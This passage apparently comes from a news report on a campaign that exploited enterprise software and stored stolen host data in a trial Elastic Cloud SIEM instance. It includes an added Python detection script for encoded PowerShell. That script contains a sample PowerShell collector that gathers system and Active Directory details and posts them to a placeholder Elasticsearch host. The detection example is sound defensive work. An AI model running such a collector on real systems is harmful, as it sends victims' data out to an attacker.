Threat Actor Exploits Flaws and Uses Elastic Cloud SIEM to Manage Stol
https://www.infosecurity-magazine.com/news/elastic-cloud-siem-manage-stolen/
Publish Date: 2026-03-09 11:45:00
Source Domain: www.infosecurity-magazine.com
A campaign exploiting multiple software vulnerabilities to steal system data and store it in a cloud-based security platform has been uncovered by cybersecurity researchers.
Investigators found that a threat actor used a free-trial instance of Elastic Cloud’s security information and event management (SIEM) platform to collect and analyse data from compromised systems across dozens of organisations.
The activity was discovered by researchers at Huntress, who observed attackers exploiting flaws in widely used enterprise software, including SolarWinds Web Help Desk.
Instead of using traditional command-and-control (C2) infrastructure, the attacker exfiltrated victim data directly into an attacker-controlled instance of Elastic Cloud, effectively turning a legitimate security monitoring tool into a repository for stolen information.
Elastic Trial as Data Hub and VPN Infrastructure
According to the investigation, the attacker ran an encoded PowerShell command on compromised systems that gathered detailed host information. The script collected operating system details, hardware specifications, Active Directory data and installed patch information before transmitting it to an Elasticsearch index named "systeminfo".
Researchers said the tactic allowed the operator to triage victims and prioritise targets using SIEM tools designed for defensive security monitoring.
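As an added example (not code from Huntress, Elastic or the article), the following Python shows how a detection engineer could surface this pattern in process-creation telemetry: decode the -EncodedCommand argument (base64 of UTF-16LE text), then look for host-inventory cmdlets combined with an HTTP upload, or for any Elasticsearch indexing path such as the reported "systeminfo" index. The sample events, the deployment hostname and the Elastic Cloud hostname suffixes in the regex are constructed or assumed for illustration, not taken from the investigation.

```python
"""Flag encoded PowerShell that collects host inventory and ships it to an
Elasticsearch index. Added example; not Huntress, Elastic or article code."""
import base64
import json
import re

# Any '-flag value' pair. PowerShell accepts any unambiguous prefix of
# -EncodedCommand (-e, -ec, -enc, ...), so the prefix test is done in code.
_ARG = re.compile(r"(?:^|\s)-(\w+)\s+([A-Za-z0-9+/=]{8,})")

# Cmdlets that gather the kind of inventory the article describes
# (OS, hardware, patches, Active Directory).
_COLLECT = re.compile(r"Get-(?:ComputerInfo|CimInstance|WmiObject|HotFix|AD\w+)", re.I)
# Ways a PowerShell script ships data over HTTP.
_UPLOAD = re.compile(r"Invoke-RestMethod|Invoke-WebRequest|Net\.WebClient|HttpClient", re.I)
# Elasticsearch document/bulk API paths, the "systeminfo" index from the
# article, and Elastic Cloud hostname suffixes (the suffixes are an
# assumption; tune them to your own allowlist of sanctioned deployments).
_ELASTIC = re.compile(r"/_doc\b|/_bulk\b|/systeminfo/|\.cloud\.es\.io|\.found\.io|:9200\b", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries -EncodedCommand, else None."""
    for flag, value in _ARG.findall(cmdline):
        if not "encodedcommand".startswith(flag.lower()):
            continue
        try:
            return base64.b64decode(value, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def classify(script):
    """Name the behaviours present in a decoded script, in a fixed order."""
    reasons = []
    if _COLLECT.search(script):
        reasons.append("host_inventory_collection")
    if _UPLOAD.search(script):
        reasons.append("http_upload")
    if _ELASTIC.search(script):
        reasons.append("elasticsearch_target")
    return reasons


def scan_events(events):
    """events: dicts with 'host', 'pid', 'cmdline'. Returns a list of findings."""
    findings = []
    for ev in events:
        script = decode_encoded_command(ev["cmdline"])
        if script is None:
            continue
        reasons = classify(script)
        # Alert when inventory is both collected and uploaded, or when an
        # encoded command names an Elasticsearch indexing target at all.
        if "elasticsearch_target" in reasons or (
            "host_inventory_collection" in reasons and "http_upload" in reasons
        ):
            findings.append({"host": ev["host"], "pid": ev["pid"],
                             "reasons": reasons, "script": script})
    return findings


def encode_ps(script):
    """Build an -EncodedCommand argument the way powershell.exe expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample script and process-creation events (not real telemetry).
# The hostname is a placeholder; the index path mirrors the reported index.
_COLLECTOR = (
    "$i=@{os=(Get-CimInstance Win32_OperatingSystem).Caption;"
    "hw=(Get-CimInstance Win32_ComputerSystem).Model;"
    "kb=(Get-HotFix|Select-Object -ExpandProperty HotFixID);"
    "dom=(Get-ADDomain).DNSRoot};"
    "Invoke-RestMethod -Method Post -Uri 'https://deployment.example/systeminfo/_doc' "
    "-Headers @{Authorization='ApiKey REDACTED'} -Body ($i|ConvertTo-Json) "
    "-ContentType 'application/json'"
)
SAMPLE_EVENTS = [
    {"host": "ws01", "pid": 4120,
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"host": "ws02", "pid": 5016,
     "cmdline": "powershell.exe -ep bypass -enc "
                + encode_ps("Get-Process | Out-File C:\\temp\\p.txt")},
    {"host": "srv-whd", "pid": 7788,
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_ps(_COLLECTOR)},
]

if __name__ == "__main__":
    print(json.dumps(scan_events(SAMPLE_EVENTS), indent=2))
```

Only the third sample event is flagged: the second decodes cleanly but does neither collection nor upload. Where PowerShell script block logging (Event ID 4104) is enabled the decoded script is already in the log and the decode step can be skipped; the more durable signal is an encoded command from a server process that writes to an Elasticsearch API on a deployment the organisation does not own.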
The Elastic Cloud deployment was created on January 28, 2026, and remained active for several days. Telemetry showed the operator repeatedly interacting with the environment through the Kibana interface, logging hundreds of actions while examining incoming victim data.
Further analysis revealed that the trial account was registered using a disposable email address linked to the domain quieresmail.com. Investigators believe the address format is tied to the Russian-registered…